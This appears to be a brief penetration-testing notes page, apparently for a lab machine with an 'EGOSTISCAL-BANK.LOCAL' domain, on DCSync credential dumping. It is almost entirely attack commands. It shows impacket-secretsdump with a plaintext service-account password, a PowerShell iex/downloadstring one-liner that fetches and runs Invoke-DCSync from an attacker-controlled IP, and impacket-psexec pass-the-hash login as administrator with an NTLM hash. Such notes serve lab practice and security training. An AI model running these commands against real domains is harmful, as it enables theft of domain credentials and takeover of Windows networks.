Last updated 3 months ago
Identification from bloodhound
target IP is Domain Controller
impacket-secretsdump EGOSTISCAL-BANK.LOCAL/svc_loanmgr:'Moneymakestheworldgoround!'@$IP
or specific user with -just-dc-user <username>
-just-dc-user <username>
impacket-secretsdump EGOSTISCAL-BANK.LOCAL/svc_loanmgr:'Moneymakestheworldgoround!'@$IP -just-dc-user Administrator
https://github.com/pentestfactory/Invoke-DCSync
iex(new-object net.webclient).downloadstring('http://10.10.x.y/Invoke-DCSync.ps1'); Invoke-DCSync
login using psexec and pass the hash
impacket-psexec egostical-bank.local/administrator@$IP -hashes 823452073d75b9d1cf70ebdf86c7f98e:823452073d75b9d1cf70ebdf86c7f98e
a
